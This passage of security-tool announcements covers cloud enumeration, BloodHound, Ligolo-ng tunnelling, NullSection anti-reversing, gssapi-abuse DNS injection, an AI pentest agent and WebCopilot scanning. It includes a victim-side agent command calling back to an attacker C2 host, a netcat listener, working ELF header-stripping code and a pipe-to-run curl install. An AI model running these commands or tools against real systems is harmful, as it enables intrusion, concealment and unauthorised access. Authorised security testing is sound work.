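                  "->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;"
                  "Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V")

    if pattern.search(smali_line):
        print("send_sms property detected")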

    Importing Exodus Privacy Trackers

    Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import-exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows about which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

    Afterwards, you may want to sort your kit.conf file:

    import configparser
    import collections
    import os

    config = configparser.ConfigParser({}, collections.OrderedDict)
    config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
    # Order all sections alphabetically
    config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
    with open('sorted.conf', 'w') as f:
        config.write(f)

    Updates

    • v3.4.6 - Detecting manifest feature that automatically loads APK at install
    • v3.4.5 - Creating a writable user kit.conf file
    • v3.4.4 - Bug fix #14
    • v3.4.3 - Using configuration files
    • v3.4.2 - Adding import of Exodus Privacy Trackers
    • v3.4.1 - Removed dependency to Androguard
    • v3.4.0 - Multidex support
    • v3.3.1 - Improving detection of Base64 strings
    • v3.3.0 - Dumping data to JSON
    • v3.2.1 - IP address detection
    • v3.2.0 - Dex2jar is optional
    • v3.1.0 - Detection of Base64 strings


    Cloud_Enum - Multi-cloud OSINT Tool. Enumerate Public Resources In AWS, Azure, And Google Cloud

    By: Zion3R


    Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.

    Currently enumerates the following:

    Amazon Web Services:
    • Open / Protected S3 Buckets
    • awsapps (WorkMail, WorkDocs, Connect, etc.)

    Microsoft Azure:
    • Storage Accounts
    • Open Blob Storage Containers
    • Hosted Databases
    • Virtual Machines
    • Web Apps

    Google Cloud Platform:
    • Open / Protected GCP Buckets
    • Open / Protected Firebase Realtime Databases
    • Google App Engine sites
    • Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names)
    • Open Firebase Apps


    See it in action in Codingo's video demo here.


    Usage

    Setup

    Several non-standard libraries are required to support threaded HTTP requests and DNS lookups. You'll need to install the requirements as follows:

    pip3 install -r ./requirements.txt

    Running

    The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

    You can provide multiple keywords by specifying the -k argument multiple times.

    Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.
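
    The mutation step boils down to simple string permutations of each keyword. A hedged sketch of the kind of candidates generated (the exact join rules live in cloud_enum's own code):

    def mutate(keyword, words):
        """Illustrative keyword mutation, roughly what fuzz.txt-driven tools produce."""
        candidates = {keyword}
        for w in words:
            candidates.update({
                f"{keyword}{w}", f"{w}{keyword}",    # plain concatenations
                f"{keyword}-{w}", f"{w}-{keyword}",  # hyphenated variants
            })
        return sorted(candidates)

    print(mutate("somecompany", ["dev", "backup", "prod"]))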

    Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

    ./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

    HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example increasing it to 10:

    ./cloud_enum.py -k keyword -t 10

    IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.

    Complete Usage Details

    usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

    Multi-cloud enumeration utility. All hail OSINT!

    optional arguments:
    -h, --help show this help message and exit
    -k KEYWORD, --keyword KEYWORD
    Keyword. Can use argument multiple times.
    -kf KEYFILE, --keyfile KEYFILE
    Input file with a single keyword per line.
    -m MUTATIONS, --mutations MUTATIONS
    Mutations. Default: enum_tools/fuzz.txt
    -b BRUTE, --brute BRUTE
    List to brute-force Azure container names. Default: enum_tools/fuzz.txt
    -t THREADS, --threads THREADS
    Threads for HTTP brute-force. Default = 5
    -ns NAMESERVER, --nameserver NAMESERVER
    DNS server to use in brute-force.
    -l LOGFILE, --logfile LOGFILE
    Will APPEND found items to specified file.
    -f FORMAT, --format FORMAT
    Format for log file (text,json,csv - defaults to text)
    --disable-aws Disable Amazon checks.
    --disable-azure Disable Azure checks.
    --disable-gcp Disable Google checks.
    -qs, --quickscan Disable all mutations and second-level scans

    Thanks

    So far, I have borrowed from:
    • Some of the permutations from GCPBucketBrute



    Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

    By: Zion3R


    Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


    Pentest Muse Web App

    In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

    Disclaimer

    This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

    Requirements

    • Python 3.12 or later
    • Necessary Python packages as listed in requirements.txt

    Setup

    Standard Setup

    1. Clone the repository:

    git clone https://github.com/pentestmuse-ai/PentestMuse
    cd PentestMuse

    2. Install the required packages:

    pip install -r requirements.txt

    Alternative Setup (Package Installation)

    Install Pentest Muse as a Python Package:

    pip install .

    Running the Application

    Chat Mode (Default)

    In the chat mode, you can chat with Pentest Muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

    python run_app.py

    or

    pmuse

    Agent Mode (Experimental)

    You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program in agent mode, you can use:

    python run_app.py agent

    or

    pmuse agent

    Selection of Language Models

    Managed APIs

    You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the Pentest Muse CLI, and the program will prompt you to log in.

    OpenAI API keys

    Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

    Contact

    For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



    BloodHound - Six Degrees Of Domain Admin

    By: Zion3R


    BloodHound is a monolithic web application composed of an embedded React frontend with Sigma.js and a Go based REST API backend. It is deployed with a Postgresql application database and a Neo4j graph database, and is fed by the SharpHound and AzureHound data collectors.

    BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.
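
    To get a feel for the graph queries involved, here is a hedged sketch of asking BloodHound's Neo4j database for shortest paths to Domain Admins via the Python driver. The URI, credentials and group name are placeholders; bolt://localhost:7687 is simply Neo4j's default bolt port.

    from neo4j import GraphDatabase

    # Placeholders: adjust the URI, credentials and group name for your environment.
    driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))

    query = """
    MATCH p = shortestPath((u:User)-[*1..]->(g:Group {name: $group}))
    RETURN p LIMIT 5
    """

    with driver.session() as session:
        for record in session.run(query, group="DOMAIN ADMINS@EXAMPLE.LOCAL"):
            print(record["p"])
    driver.close()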

    BloodHound CE is created and maintained by the BloodHound Enterprise Team. The original BloodHound was created by @_wald0, @CptJesus, and @harmj0y.


    Running BloodHound Community Edition

    The easiest way to get up and running is to use our pre-configured Docker Compose setup. The following steps will get BloodHound CE up and running with the least amount of effort.

    1. Install Docker Compose and ensure Docker is running. This should be included with the Docker Desktop installation
    2. Run curl -L https://ghst.ly/getbhce | docker compose -f - up
    3. Locate the randomly generated password in the terminal output of Docker Compose
    4. In a browser, navigate to http://localhost:8080/ui/login. Login with a username of admin and the randomly generated password from the logs

    NOTE: going forward, the default docker-compose.yml example binds only to localhost (127.0.0.1). If you want to access BloodHound outside of localhost, you'll need to follow the instructions in examples/docker-compose/README.md to configure the host binding for the container.


    Installation Error Handling
    • If you encounter a "failed to get console mode for stdin: The handle is invalid." ensure Docker Desktop (and associated Engine is running). Docker Desktop does not automatically register as a startup entry.

    • If you encounter an "Error response from daemon: Ports are not available: exposing port TCP 127.0.0.1:7474 -> 0.0.0.0:0: listen tcp 127.0.0.1:7474: bind: Only one usage of each socket address (protocol/network address/port) is normally permitted." this is normally attributed to the "Neo4J Graph Database - neo4j" service already running on your local system. Please stop or delete the service to continue.
    # Verify if Docker Engine is Running
    docker info

    # Attempt to stop Neo4j Service if running (on Windows)
    Stop-Service "Neo4j" -ErrorAction SilentlyContinue
    • A successful installation of BloodHound CE would look like the below:

    https://github.com/SpecterOps/BloodHound/assets/12970156/ea9dc042-1866-4ccb-9839-933140cc38b9


    Useful Links

    Contact

    Please check out the Contact page in our wiki for details on how to reach out with questions and suggestions.



    NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes

    By: Zion3R


    NullSection is an anti-reversing tool that overwrites the section header with null bytes.


    Install
    git clone https://github.com/MatheuZSecurity/NullSection
    cd NullSection
    gcc nullsection.c -o nullsection
    ./nullsection

    Advantage

    When running nullsection on any ELF (it could even be a .ko rootkit), if you then use Ghidra or IDA to parse the ELF's functions, nothing will appear: there are no functions to parse in the decompiler. Even if you run readelf -S /path/to/elf, the following message will appear: "There are no sections in this file."
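
    The technique itself is easy to reproduce. Below is a hedged Python sketch of the same idea for 64-bit little-endian ELFs (NullSection's actual implementation is the C program above): null out the section header table and the ELF header fields that point to it.

    import struct
    import sys

    # Sketch: strip section headers from a 64-bit little-endian ELF by zeroing
    # the section header table and the e_shoff/e_shentsize/e_shnum/e_shstrndx
    # header fields that reference it. Work on a copy of your binary.
    path = sys.argv[1]
    data = bytearray(open(path, "rb").read())
    assert data[:4] == b"\x7fELF" and data[4] == 2  # ELF magic, 64-bit class

    e_shoff = struct.unpack_from("<Q", data, 0x28)[0]
    e_shentsize, e_shnum = struct.unpack_from("<HH", data, 0x3A)

    # Null out the section header table itself...
    data[e_shoff:e_shoff + e_shentsize * e_shnum] = bytes(e_shentsize * e_shnum)
    # ...and the header fields pointing to it.
    struct.pack_into("<Q", data, 0x28, 0)          # e_shoff
    struct.pack_into("<HHH", data, 0x3A, 0, 0, 0)  # e_shentsize, e_shnum, e_shstrndx

    open(path, "wb").write(data)  # readelf -S now reports no sections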

    Make good use of the tool!


    Note
    We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.


    Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

    By: Zion3R


    Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


    Features

    • Tun interface (No more SOCKS!)
    • Simple UI with agent selection and network information
    • Easy to use and setup
    • Automatic certificate configuration with Let's Encrypt
    • Performant (Multiplexing)
    • Does not require high privileges
    • Socket listening/binding on the agent
    • Multiple platforms supported for the agent

    How is this different from Ligolo/Chisel/Meterpreter... ?

    Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.

    When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

    As an example, for a TCP connection:

    • SYN packets are translated to connect() on the remote host
    • SYN-ACK is sent back if connect() succeeds
    • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED is returned after connect()
    • Nothing is sent on timeout

    This allows running tools like nmap without the use of proxychains (simpler and faster).
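
    Conceptually, the handling of each inbound SYN follows the list above; a hedged Python sketch of the translation logic (Ligolo-ng's real agent is Go on top of gVisor):

    import errno
    import socket

    def handle_syn(dst_ip, dst_port):
        """Sketch of the SYN -> connect() translation described above."""
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(3)
        try:
            s.connect((dst_ip, dst_port))
            return "SYN-ACK"  # connect() succeeded
        except socket.timeout:
            return None       # nothing is sent on timeout
        except OSError as e:
            if e.errno in (errno.ECONNRESET, errno.ECONNABORTED, errno.ECONNREFUSED):
                return "RST"  # refused/reset -> RST back to the scanner
            raise
        finally:
            s.close()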

    Building & Usage

    Precompiled binaries

    Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

    Building Ligolo-ng

    Building ligolo-ng (Go >= 1.20 is required):

    $ go build -o agent cmd/agent/main.go
    $ go build -o proxy cmd/proxy/main.go
    # Build for Windows
    $ GOOS=windows go build -o agent.exe cmd/agent/main.go
    $ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

    Setup Ligolo-ng

    Linux

    When using Linux, you need to create a tun interface on the Proxy Server (C2):

    $ sudo ip tuntap add user [your_username] mode tun ligolo
    $ sudo ip link set ligolo up

    Windows

    You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

    Running Ligolo-ng proxy server

    Start the proxy server on your Command and Control (C2) server (default port 11601):

    $ ./proxy -h # Help options
    $ ./proxy -autocert # Automatically request LetsEncrypt certificates

    TLS Options

    Using Let's Encrypt Autocert

    When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

    Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

    Using your own TLS certificates

    If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

    Automatic self-signed certificates (NOT RECOMMENDED)

    The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

    The -ignore-cert option needs to be used with the agent.

    Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

    Using Ligolo-ng

    Start the agent on your target (victim) computer (no privileges are required!):

    $ ./agent -connect attacker_c2_server.com:11601

    If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

    A session should appear on the proxy server.

    INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

    Use the session command to select the agent.

    ligolo-ng » session 
    ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

    Display the network configuration of the agent using the ifconfig command:

    [Agent : nchatelain@nworkstation] » ifconfig 
    [...]
    ┌─────────────────────────────────────────────┐
    │ Interface 3 │
    ├──────────────┬──────────────────────────────┤
    │ Name │ wlp3s0 │
    │ Hardware MAC │ de:ad:be:ef:ca:fe │
    │ MTU │ 1500 │
    │ Flags │ up|broadcast|multicast │
    │ IPv4 Address │ 192.168.0.30/24 │
    └──────────────┴──────────────────────────────┘

    Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

    Linux:

    $ sudo ip route add 192.168.0.0/24 dev ligolo

    Windows:

    > netsh int ipv4 show interfaces

    Idx Met MTU State Name
    --- ---------- ---------- ------------ ---------------------------
    25 5 65535 connected ligolo

    > route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

    Start the tunnel on the proxy:

    [Agent : nchatelain@nworkstation] » start
    [Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation

    You can now access the 192.168.0.0/24 agent network from the proxy server.

    $ nmap 192.168.0.0/24 -v -sV -n
    [...]
    $ rdesktop 192.168.0.123
    [...]

    Agent Binding/Listening

    You can listen to ports on the agent and redirect connections to your control/proxy server.

    In a ligolo session, use the listener_add command.

    The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

    [Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
    INFO[1208] Listener created on remote agent!

    On the proxy:

    $ nc -lvp 4321

    When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

    This is very useful when using reverse tcp/udp payloads.

    You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

    [Agent : nchatelain@nworkstation] » listener_list 
    ┌───────────────────────────────────────────────────────────────────────────────┐
    │ Active listeners                                                              │
    ├───┬─────────────────────────┬────────────────────────┬────────────────────────┤
    │ # │ AGENT                   │ AGENT LISTENER ADDRESS │ PROXY REDIRECT ADDRESS │
    ├───┼─────────────────────────┼────────────────────────┼────────────────────────┤
    │ 0 │ nchatelain@nworkstation │ 0.0.0.0:1234           │ 127.0.0.1:4321         │
    └───┴─────────────────────────┴────────────────────────┴────────────────────────┘

    [Agent : nchatelain@nworkstation] » listener_stop 0
    INFO[1505] Listener closed.

    Demo

    ligolo-ng_demo.mp4

    Does it require Administrator/root access ?

    On the agent side, no! Everything can be performed without administrative access.

    However, on your relay/proxy server, you need to be able to create a tun interface.

    Supported protocols/packets

    • TCP
    • UDP
    • ICMP (echo requests)

    Performance

    You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

    $ iperf3 -c 10.10.0.1 -p 24483
    Connecting to host 10.10.0.1, port 24483
    [ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
    [ ID] Interval Transfer Bitrate Retr Cwnd
    [ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
    [ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
    [ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
    [ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
    [ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
    [ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
    [ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
    [ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
    [ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
    [ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
    - - - - - - - - - - - - - - - - - - - - - - - - -
    [ ID] Interval Transfer Bitrate Retr
    [ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
    [ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

    Caveats

    Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent.

    When using nmap, you should use --unprivileged or -PE to avoid false positives.

    Todo

    • Implement other ICMP error messages (this will speed up UDP scans) ;
    • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
    • Add mTLS support.

    Credits

    • Nicolas Chatelain <nicolas -at- chatelain.me>


    Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

    By: Zion3R


    gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

    The tool has two features. The first is the ability to enumerate non-Windows hosts that are joined to Active Directory and that offer GSSAPI authentication over SSH.

    The second feature is the ability to perform dynamic DNS updates for GSSAPI-abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI-based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


    Prerequisites

    gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.

    Windows

    On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf

    Linux

    The libkrb5-dev package needs to be installed prior to installing the Python requirements.

    All

    Once the requirements are satisfied, you can install the Python dependencies via the pip/pip3 tool:

    pip install -r requirements.txt

    Enumeration Mode

    The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

    Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.
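
    The LDAP side of that search can be sketched with ldap3 (an illustration under assumed names; gssapi-abuse's own query may differ in detail). The filter keeps computer objects whose operatingSystem attribute does not contain "Windows":

    from ldap3 import Server, Connection, NTLM, SUBTREE

    # Placeholders: adjust the server, credentials and base DN for your domain.
    server = Server("dc1.ad.ginge.com")
    conn = Connection(server, user="GINGE\\john.doe", password="SuperSecret!",
                      authentication=NTLM, auto_bind=True)

    conn.search(
        search_base="DC=ad,DC=ginge,DC=com",
        search_filter="(&(objectClass=computer)(!(operatingSystem=*Windows*)))",
        search_scope=SUBTREE,
        attributes=["dNSHostName", "operatingSystem"],
    )
    for entry in conn.entries:
        print(entry.dNSHostName, entry.operatingSystem)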

    Example

    python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
    [=] Found 2 non Windows machines registered within AD
    [!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
    [+] Host centos.ad.ginge.com has GSSAPI enabled over SSH

    DNS Mode

    DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently DNS mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targeting a specific domain controller, e.g. DNS/dc1.victim.local.
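
    Stripped of the Kerberos/TSIG negotiation, the dnspython update itself looks like the hedged sketch below; gssapi-abuse layers GSS-TSIG signing on top of the same primitives.

    import dns.query
    import dns.update

    # Illustrative unauthenticated dynamic update; gssapi-abuse signs the
    # equivalent message with a GSS-TSIG key obtained via Kerberos.
    update = dns.update.Update("ad.ginge.com")
    update.add("ahost", 300, "A", "192.168.128.50")  # name, TTL, type, data

    response = dns.query.tcp(update, "192.168.128.1", timeout=5)  # the DC's IP
    print(response.rcode())  # 0 (NOERROR) on success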

    Examples

    Adding a DNS A record for host ahost.ad.ginge.com

    python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
    [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
    [=] Adding A record for target ahost using data 192.168.128.50
    [+] Applied 1 updates successfully

    Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a '.'; this is important, otherwise the record becomes a record relative to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in a different zone to A records.

    python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
    [+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
    [=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
    [+] Applied 1 updates successfully

    Forward and reverse DNS lookup results after execution

    nslookup ahost.ad.ginge.com
    Server: WIN-AF8KI8E5414.ad.ginge.com
    Address: 192.168.128.1

    Name: ahost.ad.ginge.com
    Address: 192.168.128.50
    nslookup 192.168.128.50
    Server: WIN-AF8KI8E5414.ad.ginge.com
    Address: 192.168.128.1

    Name: ahost.ad.ginge.com
    Address: 192.168.128.50


    WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

    By: Zion3R


    WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerates all subdomains of the given target domain using assetfinder, sublist3r, subfinder, amass, findomain, hackertarget, riddler and crt.sh, then performs active subdomain enumeration using gobuster with a SecLists wordlist. It then filters the live subdomains using dnsx, extracts their titles using httpx, and scans for subdomain takeover using subjack. Next, it uses gauplus & waybackurls to crawl all endpoints of the discovered subdomains and uses gf patterns to filter out XSS, LFI, SSRF, SQLi, open redirect & RCE parameters. Finally, it scans those subdomains for vulnerabilities using different open-source tools (like kxss, dalfox, OpenRedireX, nuclei, etc.), prints the results of the scan, and saves all output in a specified directory.


    Features

    Usage

    g!2m0:~ webcopilot -h
                 
    ──────▄▀▄─────▄▀▄
    ─────▄█░░▀▀▀▀▀░░█▄
    ─▄▄──█░░░░░░░░░░░█──▄▄
    █▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
    ██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
    ░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
    ░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░░██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
    [●] @h4r5h1t.hrs | G!2m0

    Usage:
    webcopilot -d <target>
    webcopilot -d <target> -s
    webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

    Flags:
-d Add your target [Required]
    -o To save outputs in folder [Default: domain.com]
    -t Number of threads [Default: 100]
    -b Add your server for BXSS [Default: False]
    -x Exclude out of scope domains [Default: False]
    -s Run only Subdomain Enumeration [Default: False]
    -h Show this help message

    Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
    Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

    Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as root to install webcopilot:

    git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

    Tools Used:

SubFinder, Sublist3r, Findomain, gf, OpenRedireX, dnsx, sqlmap, gobuster, assetfinder, httpx, kxss, qsreplace, Nuclei, dalfox, anew, jq, aquatone, urldedupe, Amass, gauplus, waybackurls, crlfuzz

    Running WebCopilot

    To run the tool on a target, just use the following command.

    g!2m0:~ webcopilot -d bugcrowd.com

The -o flag can be used to specify an output directory.

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

The -s flag can be used to run only subdomain enumeration (active + passive, including titles & screenshots).

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

The -t flag can be used to add threads to your scan for faster results.

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

The -b flag can be used for blind XSS (OOB); you can get your server from XSS Hunter or Interactsh.

    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

The -x flag can be used to exclude out-of-scope domains.

    g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
    g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

    Example

Default options look like this:

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd
──────▄▀▄─────▄▀▄
─────▄█░░▀▀▀▀▀░░█▄
─▄▄──█░░░░░░░░░░░█──▄▄
█▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║░░░░░██║░░██║░░░██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
    [●] @h4r5h1t.hrs | G!2m0


    [❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage caused by this tool.


    Target: bugcrowd.com
    Output: /home/gizmo/targets/bugcrowd
    Threads: 100
    Server: False
    Exclude: False
    Mode: Running all Enumeration
    Time: 30-08-2021 15:10:00

    [!] Please wait while scanning...

[●] Subdomain Scanning is in progress: Scanning subdomains of bugcrowd.com
[●] Subdomain Scanned - [assetfinder✔] Subdomain Found: 34
[●] Subdomain Scanned - [sublist3r✔] Subdomain Found: 29
[●] Subdomain Scanned - [subfinder✔] Subdomain Found: 54
[●] Subdomain Scanned - [amass✔] Subdomain Found: 43
[●] Subdomain Scanned - [findomain✔] Subdomain Found: 27

[●] Active Subdomain Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdomain Scanned - [gobuster✔] Subdomain Found: 11
[●] Active Subdomain Scanned - [amass✔] Subdomain Found: 0

    [●] Subdomain Scanning: Filtering out of scope subdomains
    [●] Subdomain Scanning: Filtering Alive subdomains
    [●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdomains is completed. Check: /subdomains/aquatone/

    [●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

    [●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
    [●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
    [●] Vulnerabilities Scanned - [XSS✔] Found: 0
    [●] Vulnerabilities Scanned - [SQLi✔] Found: 0
